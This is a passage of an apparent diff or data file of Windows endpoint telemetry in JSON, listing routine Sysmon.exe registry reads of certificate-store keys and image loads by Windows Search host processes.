"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SearchFilterHost.exe", - "image_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "tquery.dll", - "image_path": "C:\\Windows\\System32\\tquery.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 
131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "mssprxy.dll", - "image_path": "C:\\Windows\\System32\\mssprxy.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "mssprxy.dll", - "image_path": "C:\\Windows\\System32\\mssprxy.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": 
